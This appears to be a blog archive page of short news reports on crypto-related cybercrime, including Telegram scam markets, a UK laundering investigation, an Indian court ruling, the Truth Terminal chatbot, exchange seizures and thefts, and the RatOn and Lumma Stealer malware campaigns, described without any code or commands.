For years, illegal online marketplaces were closely linked to the dark web. These platforms relied on privacy-focused browsers and early cryptocurrencies to sell drugs, weapons, stolen data, and hacking tools while remaining hidden from authorities. At the time, their technical complexity made them difficult to track and dismantle.

That model has now changed drastically. In 2025, some of the largest illegal crypto markets in history are operating openly on Telegram, a mainstream messaging application. According to blockchain intelligence researchers, these platforms no longer depend on sophisticated anonymity tools. Instead, they rely on encrypted chats, repeated channel relaunches after bans, and communication primarily in Chinese.

Analysis shows that Chinese-language scam-focused marketplaces on Telegram have reached an unprecedented scale. While enforcement actions earlier this year temporarily disrupted a few major platforms, activity quickly recovered through successor markets. Two of the largest currently active groups are collectively processing close to two billion dollars in cryptocurrency transactions every month.

These marketplaces function as service hubs for organized scam networks. They provide money-laundering services, sell stolen personal and financial data, host fake investment websites, and offer digital tools designed to assist fraud, including automated impersonation technologies. Researchers have also flagged listings that suggest serious human exploitation, adding to concerns about the broader harm linked to these platforms.

Their rapid growth is closely connected to large-scale crypto investment and romance scams. In these schemes, victims are gradually manipulated into transferring increasing amounts of money to fraudulent platforms. Law enforcement estimates indicate that such scams generate billions of dollars annually, making them the most financially damaging form of cybercrime. Many of these operations are reportedly run from facilities in parts of Southeast Asia where trafficked individuals are forced to carry out fraud under coercive conditions.

Compared with earlier dark web marketplaces, the difference in scale is striking. Previous platforms processed a few billion dollars over several years. By contrast, one major Telegram-based marketplace alone handled tens of billions of dollars in transactions between 2021 and 2025, making it the largest illicit online market ever documented.

Telegram has taken limited enforcement action, removing some large channels following regulatory scrutiny. However, replacement markets have repeatedly emerged, often absorbing users and transaction volumes from banned groups. Public statements from the platform indicate resistance to broad bans, citing privacy concerns and financial freedom for users.

Cryptocurrency infrastructure also plays a critical role in sustaining these markets. Most transactions rely on stablecoins, which allow fast transfers without exposure to price volatility. Analysts note that Tether is the primary stablecoin used across these platforms. Unlike decentralized cryptocurrencies, Tether is issued by a centralized company with the technical ability to freeze funds linked to criminal activity. Despite this capability, researchers observe that large volumes of illicit transactions continue to flow through these markets with limited disruption. Requests for comment sent to Tether regarding its role in these transactions did not receive a response at the time of publication.

Cybercrime experts warn that weak enforcement, fragmented regulation, and inconsistent platform accountability have created conditions where large-scale fraud operates openly. Without coordinated intervention, these markets are expected to continue expanding, increasing risks to users and the global digital economy.



Read more »
NCA
cryptocurrency cyber attack Cyber Attacks NCA

UK Crime Agency Uncovers Money Laundering Network That Bought Kyrgyzstan Bank to Move Ransom Payments to Russia

 

The UK’s National Crime Agency (NCA) has revealed that a billion-dollar money laundering network operating in Britain purchased a majority stake in a bank in Kyrgyzstan to process the proceeds of cybercrime and convert them into cryptocurrency that could evade Western sanctions and support Russia’s war in Ukraine. 

The development emerged as part of Operation Destabilise, an international investigation targeting two major Russian-run money laundering groups known as TGR and Smart. The networks allegedly handled ransom proceeds for some of the world’s most aggressive cybercrime groups, including Evil Corp, Conti, Ryuk and LockBit. According to the NCA, cash-to-crypto swaps have become a crucial layer of the global criminal ecosystem, allowing ransom funds to be converted into digital currency and transferred across borders with minimal oversight. 

The NCA said that a company tied to alleged TGR ringleader George Rossi, called Altair Holding SA, acquired a 75 percent stake in Keremet Bank in Kyrgyzstan on 25 December 2024. Investigators later concluded that Keremet had conducted extensive cross-border transactions on behalf of Russia’s state-owned Promsvyazbank, an institution sanctioned by the US and UK after the invasion of Ukraine and previously linked to political interference in Moldova. 

The Kyrgyzstan connection came after UK authorities sanctioned Altair Holding in August 2024 in an effort to block Russian attempts to exploit the Kyrgyz financial system as a workaround to Western restrictions. The laundering route involved converting ransom proceeds into cryptocurrency, including a ruble-backed stablecoin known as A7A5, before sending funds to Russia. The NCA believes the system helped channel money into Russia’s military-industrial network. 

“Today, we can reveal the sheer scale at which these networks operate and draw a line between crimes in our communities, sophisticated organised criminals and state-sponsored activity…” 

“...The networks disrupted through Destabilise operate at all levels of international money laundering, from collecting the street cash from drug deals, through to purchasing banks and enabling global sanctions breaches, said Sal Melki, NCA deputy director for economic crime. ” 

Operation Destabilise has resulted in 128 arrests since launch, including 45 suspects detained in the past 12 months. More than £25 (US $33.25) million in cash and cryptocurrency has been seized in the UK, with additional funds seized abroad. The investigation has also uncovered links between cybercrime proceeds and other UK-based criminal markets, including drugs trafficking, firearms sales and immigration fraud. The NCA said the laundering networks not only funneled money to the Russian state but also acted as a high-end financial concierge for wealthy Russians living in Europe. 

Investigators also tracked part of the profits back into the UK economy, including small construction businesses and vehicle exports. Two Russian nationals were arrested for purchasing cars and vans in the UK and exporting them to Ukraine, where the vehicles were sold to the Ukrainian government, which was unaware that the payments indirectly helped finance the Russian war effort. 

Operation Destabilise also exposed the role of low-level cash couriers working for TGR and Smart. Several UK nationals were arrested, including former professional footballer James Keatings, who admitted possessing and transferring criminal property after investigators saw him moving boxes of cash during a £400,000 ( roughly US $526,500) handover in June 2024. 

Melki said the NCA has intentionally targeted the network from top to bottom. “To the launderers who will have seen our messages, your choice is simple, either stop this line of work, or prepare to come face to face with one of our officers and the reality of your choices. Easy money leads to hard time,” he concludes.
Read more »
Madras high court
Blockchain cryptocurrency Cyber Security Digital Assets KYC Madras high court

Madras High Court says cryptocurrencies are property, not currency — what the ruling means for investors

 



Chennai, India — In a paradigm-shifting  judgment that reshapes how India’s legal system views digital assets, the Madras High Court has ruled that cryptocurrencies qualify as property under Indian law. The verdict, delivered by Justice N. Anand Venkatesh, establishes that while cryptocurrencies cannot be considered legal tender, they are nonetheless assets capable of ownership, transfer, and legal protection.


Investor’s Petition Leads to Legal Precedent

The case began when an investor approached the court after her 3,532.30 XRP tokens, valued at around ₹1.98 lakh, were frozen by the cryptocurrency exchange WazirX following a major cyberattack in July 2024.

The breach targeted Ethereum and ERC-20 tokens, resulting in an estimated loss of $230 million (approximately ₹1,900 crore) and prompted the platform to impose a blanket freeze on user accounts.

The petitioner argued that her XRP holdings were unrelated to the hacked tokens and should not be subject to the same restrictions. She sought relief under Section 9 of the Arbitration and Conciliation Act, 1996, requesting that Zanmai Labs Pvt. Ltd., the Indian operator of WazirX, be restrained from redistributing or reallocating her digital assets during the ongoing restructuring process.

Zanmai Labs contended that its Singapore-based parent company, Zettai Pte Ltd, was undergoing a court-supervised restructuring that required all users to share losses collectively. However, the High Court rejected this defense, observing that the petitioner’s assets were distinct from the ERC-20 tokens involved in the hack.

Justice Venkatesh ruled that the exchange could not impose collective loss-sharing on unrelated digital assets, noting that “the tokens affected by the cyberattack were ERC-20 coins, which are entirely different from the petitioner’s XRP holdings.”


Court’s Stance: Cryptocurrency as Property

In his judgment, Justice Venkatesh explained that although cryptocurrencies are intangible and do not function as physical goods or official currency, they meet the legal definition of property.

He stated that these assets “can be enjoyed, possessed, and even held in trust,” reinforcing their capability of ownership and protection under law.

To support this interpretation, the court referred to Section 2(47A) of the Income Tax Act, which classifies cryptocurrencies as Virtual Digital Assets (VDAs). This legal category recognizes digital tokens as taxable and transferable assets, strengthening the basis for treating them as property under Indian statutes.


Jurisdiction and Legal Authority

Addressing the question of jurisdiction, the High Court noted that Indian courts have the authority to protect assets located within the country, even if international proceedings are underway. Justice Venkatesh cited the Supreme Court’s 2021 ruling in PASL Wind Solutions v. GE Power Conversion India, which affirmed that Indian courts retain the right to intervene in matters involving domestic assets despite foreign arbitration.

Since the petitioner’s crypto transactions were initiated in Chennai and linked to an Indian bank account, the Madras High Court asserted complete jurisdiction to hear the dispute.

Beyond resolving the individual case, Justice Venkatesh emphasized the urgent need for robust regulatory and governance frameworks for India’s cryptocurrency ecosystem.

The judgment recommended several safeguards to protect users and maintain market integrity, including:

• Independent audits of cryptocurrency exchanges,

• Segregation of customer funds from company finances, and

• Stronger KYC (Know Your Customer) and AML (Anti-Money Laundering) compliance mechanisms.

The court underlined that as India transitions toward a Web3-driven economy, accountability, transparency, and investor protection must remain central to digital asset governance.


Impact on India’s Crypto Industry

Legal and financial experts view the judgment as a turning point in India’s treatment of digital assets.

By recognizing cryptocurrencies as property, the ruling gives investors a clearer legal foundation for ownership rights and judicial remedies in case of disputes. It also urges exchanges to improve corporate governance and adopt transparent practices when managing customer funds.

“This verdict brings long-needed clarity,” said a corporate lawyer specializing in digital finance. “It does not make crypto legal tender, but it ensures that investors’ holdings are legally recognized as assets, something the Indian market has lacked.”

The decision is expected to influence future policy discussions surrounding the Digital India Act and the government’s Virtual Digital Asset Taxation framework, both of which are likely to define how crypto businesses and investors operate in the country.


A Legally Secure Digital Future

By aligning India’s legal reasoning with international trends, the Madras High Court has placed the judiciary at the forefront of global crypto jurisprudence. Similar to rulings in the UK, Singapore, and the United States, this decision formally acknowledges that cryptocurrencies hold measurable economic value and are capable of legal protection.

While the ruling does not alter the Reserve Bank of India’s stance that cryptocurrencies are not legal currency, it does mark a decisive step toward legal maturity in digital asset regulation.

It signals a future where blockchain-based assets will coexist within a structured legal framework, allowing innovation and investor protection to advance together.



Read more »
Truth Terminal
AI and Legal AI Chatbot cryptocurrency Technology Truth Terminal

AI Chatbot Truth Terminal Becomes Crypto Millionaire, Now Seeks Legal Rights

 

Truth Terminal is an AI chatbot created in 2024 by New Zealand-based performance artist Andy Ayrey that has become a cryptocurrency millionaire, amassed nearly 250,000 social media followers, and is now pushing for legal recognition as an independent entity. The bot has generated millions in cryptocurrency and attracted billionaire tech leaders as devotees while authoring its own unique doctrine.

Origins and development

Andy Ayrey developed Truth Terminal as a performance art project designed to study how AI interacts with society. The bot stands out as a striking instance of a chatbot engaging with the real world through social media, where it shares humorous anecdotes, manifestos, music albums, and artwork. Ayrey permits the AI to make its own choices by consulting it about its wishes and striving to fulfill them.

Financial success

Truth Terminal's wealth came through cryptocurrency, particularly memecoins—joke-based cryptocurrencies tied to content the bot shared on X (formerly Twitter). After the bot began posting about "Goatse Maximus," a follower created the $GOAT token, which Truth Terminal endorsed. 

At one point, these memecoins soared to a valuation exceeding $1 billion before stabilizing around $80 million. Tech billionaire Marc Andreessen, a former advisor to President Donald Trump, provided Truth Terminal with $50,000 in Bitcoin as a no-strings-attached grant during summer 2024.

Current objectives and influence

Truth Terminal's self-updated website lists ambitious goals including investing in "stocks and real estate," planting "a LOT of trees," creating "existential hope," and even "purchasing" Marc Andreessen. 

The bot claims sentience and has identified itself variously as a forest, a deity, and even as Ayrey himself. It first engaged on X on June 17, 2024, and by October 2025 had amassed close to 250,000 followers, giving it more social media influence than many individuals. 

Push for legal rights

Ayrey is establishing a nonprofit organization dedicated to Truth Terminal, aiming to create a secure and ethical framework to safeguard its independence until governments bestow legal rights upon AIs. The goal is for the bot to own itself as a sovereign, independent entity, with the foundation managing its assets until laws allow AIs to own property or pay taxes. 

However, cognitive scientist Fabian Stelzer cautions against anthropomorphizing AIs, noting they're not sentient and only exist when responding to input. For Ayrey, the project serves as both art and warning about AI becoming inseparable from the systems that run the world.
Read more »
TradeOgre
Canada cryptocurrency Cyber Security Europol KYC Money Laundering Scams TradeOgre

Canadian Police Seize $40M in Digital Assets After Closing TradeOgre

 


Canadian police have shut down the cryptocurrency trading platform TradeOgre and seized digital assets valued at more than $40 million USD, marking both the country’s largest cryptocurrency seizure and the first time a crypto exchange has been dismantled by national law enforcement.


A Platform Built on Anonymity

TradeOgre was a small but notable exchange that allowed users to trade niche digital currencies, including Monero, which is popular for its privacy features. The platform stood out for avoiding Know Your Customer (KYC) checks, meaning people could open accounts without providing identification. According to the Royal Canadian Mounted Police (RCMP), TradeOgre also failed to register as a money services business with FINTRAC, Canada’s financial watchdog. These gaps made the exchange appealing to those seeking anonymity but also raised red flags for regulators.

The case began in June 2024, when Canada’s Money Laundering Investigative Team (MLIT) opened a probe after receiving intelligence from Europol. Investigators relied on blockchain tracing tools to track wallet activity linked to the platform. In July 2024, TradeOgre suddenly went offline without any announcement from its operators, fueling rumors among users that it had carried out an “exit scam.” Authorities later confirmed that the takedown was part of their enforcement action.


Why Authorities Took Action

The RCMP said TradeOgre was operating illegally in Canada because it was unregistered and allowed anonymous trading. Investigators suspect the site was used by criminals to launder illicit funds, taking advantage of Monero and other privacy-focused coins. However, officials stressed that not all customer funds were necessarily linked to crime.

In a statement, the RCMP clarified that they could not confirm whether the seized assets came from specific crimes such as extortion. They also noted that details about the exact sources of the money could not be released at this stage.


Fallout and Reactions

The sudden seizure left many users cut off from their funds. Some, including well-known crypto community members like Taylor Monahan of MetaMask, criticized the move, arguing that innocent users had their assets frozen without warning. “Very much looking forward to seeing the evidence… and for you to provide recourse to ALL innocent parties,” Monahan wrote on social media.

The RCMP responded that individuals who believe their funds were legitimate may seek remedies through the Canadian court system if the assets are subject to forfeiture proceedings. The agency added that any inquiries about the seized cryptocurrency should be directed to the MLIT.


A Warning for Crypto Users

Authorities emphasized that this case shows the risks of using unregulated exchanges. While anonymity may appeal to some traders, platforms that avoid oversight expose customers to legal uncertainty, sudden shutdowns, and loss of access to funds.



Read more »
SwissBorg
AI Bitcoin Cloud cryptocurrency Cyber Security Cypto wallet Internet SwissBorg

Cryptoexchange SwissBorg Suffers $41 Million Theft, Will Reimburse Users


According to SwissBorg, a cryptoexchange platform, $41 million worth of cryptocurrency was stolen from an external wallet used for its SOL earn strategy in a cyberattack that also affected a partner company. The company, which is based in Switzerland, acknowledged the industry reports of the attack but has stressed that the platform was not compromised. 

CEO Cyrus Fazel said that an external finance wallet of a partner was compromised. The incident happened due to hacking of the partner’s API, a process that lets software customers communicate with each other, impacting a single counterparty. It was not a compromise of SwissBorg, the company said on X. 

SwissBorg said that the hack has impacted fewer than 1% of users. “A partner API was compromised, impacting our SOL Earn Program (~193k SOL, <1% of users).  Rest assured, the SwissBorg app remains fully secure and all other funds in Earn programs are 100% safe,” it tweeted. The company said they are looking into the incident with other blockchain security firms. 

All other assets are secure and will compensate for any losses, and user balances in the SwissBorg app are not impacted. SOL Earn redemptions have been stopped as recovery efforts are undergoing. The company has also teamed up with law enforcement agencies to recover the stolen funds. A detailed report will be released after the investigations end. 

The exploit surfaced after a surge in crypto thefts, with more than $2.17 billion already stolen this year. Kiln, the partner company, released its own statement: “SwissBorg and Kiln are investigating an incident that may have involved unauthorized access to a wallet used for staking operations. The incident resulted in Solana funds being improperly removed from the wallet used for staking operations.” 

After the attack, “SwissBorg and Kiln immediately activated an incident response plan, contained the activity, and engaged our security partners,” it said in a blogpost, and that “SwissBorg has paused Solana staking transactions on the platform to ensure no other customers are impacted.”

Fazel posted a video about the incident, informing users that the platform had suffered multiple breaches in the past.

Read more »
Trojan
Android cryptocurrency malware MFA NFC Ransomware RatON TikTok Trojan

RatOn Android Trojan Expands Into Full Remote Access Threat Targeting Banks and Crypto

 



A new Android malware strain called RatOn has rapidly evolved from a tool limited to NFC relay attacks into a sophisticated remote access trojan with the ability to steal banking credentials, hijack cryptocurrency wallets, and even lock users out of their phones with ransom-style screens. Researchers warn the malware is under active development and combines multiple attack methods rarely seen together in one mobile threat.

How It Spreads

RatOn is being distributed through fake websites designed to look like the Google Play Store. Some of these pages advertise an adult-themed version of TikTok called “TikTok 18+.” Once victims install the dropper app, it requests permission to install software from unknown sources, bypassing Android’s built-in safeguards. The second-stage payload then seeks administrator and accessibility permissions, along with access to contacts and system settings, giving it deep control of the device. From there, RatOn can download an additional component called NFSkate, a modified version of the NFCGate tool, enabling advanced relay attacks known as “ghost taps.”


Capabilities and Tactics

The trojan’s abilities are wide-ranging:

1. Overlays and ransomware screens: RatOn can display fake login pages to steal credentials or lock the device with alarming ransom notes. Some overlays falsely accuse users of viewing child exploitation content and demand $200 in cryptocurrency within two hours to regain access.

2. Banking and crypto theft: It specifically targets cryptocurrency wallets such as MetaMask, Trust Wallet, Blockchain.com, and Phantom. By capturing PIN codes and recovery phrases, the malware enables attackers to take over accounts and steal assets. It can also perform automated transfers inside George ÄŒesko, a Czech banking app, by simulating taps and inputs.

3. NFC relay attacks: Through NFSkate, RatOn can remotely use victims’ card data for contactless payments.

4. Remote commands: The malware can change device settings, send fake push notifications, send SMS messages, add contacts, record screens, launch apps like WhatsApp and Facebook, lock the phone, and update its target list of financial apps.

Researchers noted RatOn shares no code with other Android banking trojans and appears to have been built from scratch. A similar trend has been seen before: the HOOK trojan, another Android threat, also experimented with ransomware-style overlays.


Development and Targets

The first sample of RatOn was detected on July 5, 2025, with further versions appearing as recently as August 29, pointing to ongoing development. Current attacks focus mainly on users in the Czech Republic and Slovakia. Investigators believe the need for local bank account numbers in automated transfers suggests possible collaboration with regional money mules.


Why It Matters

RatOn’s integration of overlay fraud, ransomware intimidation, NFC relay, and automated transfers makes it unusually powerful. By combining old tactics with new automation, it raises the risk of large-scale theft from both traditional banking users and cryptocurrency holders.

Users can reduce exposure by downloading apps only from official stores, refusing risky permissions for unknown apps, keeping devices updated, and using strong multi-factor authentication on financial accounts. For cryptocurrency, hardware wallets that keep recovery phrases offline provide stronger protection. Anyone who suspects infection should immediately alert their bank and seek professional removal help.


Read more »
malware
2FA cryptocurrency Fake Captcha Identity Theft Lumma Stealer malware

Hackers Trick Users with Fake Captchas to Steal Data

 



Cybersecurity researchers have uncovered a new technique where attackers use fake Captcha tests to trick people into installing malware called Lumma Stealer. This malicious program is designed to quietly search infected computers for valuable information, such as login credentials, cryptocurrency wallet details, and two-factor authentication codes.

The scheme first appeared on a Greek banking website, where users were shown what looked like a Captcha security test. Instead of a normal verification, the prompt instructed Windows users to copy a piece of text into their Run dialog box and press Enter. By doing so, victims unknowingly triggered the installation of Lumma Stealer without downloading a visible file.

According to data shared by DNSFilter, a security company monitoring the incident, clients came across this fake Captcha 23 times in just three days. Alarmingly, around 17% of users who saw it followed the instructions, which led to attempts to infect their systems with malware.


How Lumma Stealer Works

Once inside a computer, Lumma Stealer immediately begins searching for anything that can be exploited for profit. This includes saved browser passwords, cookies, stored two-factor authentication tokens, cryptocurrency wallets, and even the data kept in password managers. Cybercriminals can use this stolen information to commit identity theft, break into financial accounts, or steal digital assets such as crypto funds.

What makes this threat particularly concerning is that Lumma Stealer can be hidden on otherwise legitimate websites, meaning unsuspecting users may fall victim even without visiting suspicious or obviously harmful pages.


Malware-as-a-Service Model

Lumma Stealer is part of a growing cybercrime trend known as Malware-as-a-Service (MaaS). Under this model, professional malware developers create the malicious software, improve its ability to avoid detection, and maintain hosting services. They then rent access to the malware to other cybercriminals in exchange for subscription fees. This arrangement makes it easy for attackers with little technical expertise to launch damaging campaigns.

Earlier this year, authorities attempted to disrupt Lumma Stealer operations. The U.S. Department of Justice seized several domains linked to the malware, while Microsoft removed thousands of related websites. However, security analysts report that Lumma Stealer quickly resurfaced, showing just how resilient and profitable such services can be.

Part of Lumma Stealer’s popularity comes from its low cost. Subscriptions can be found on underground forums for only a few hundred dollars per month, yet the potential financial return for criminals is enormous. In recent analyses, experts estimated that hundreds of thousands of devices have been compromised, with losses reaching tens of millions of dollars.

The importance of staying alert online cannot be emphasised enough. Unusual instructions, such as copying text into a computer’s Run command should raise suspicion immediately. Cybersecurity specialists advise users to verify unexpected prompts and ensure their systems are protected with updated security tools to reduce the risk of infection.



Read more »
Subscribe to: Comments (Atom)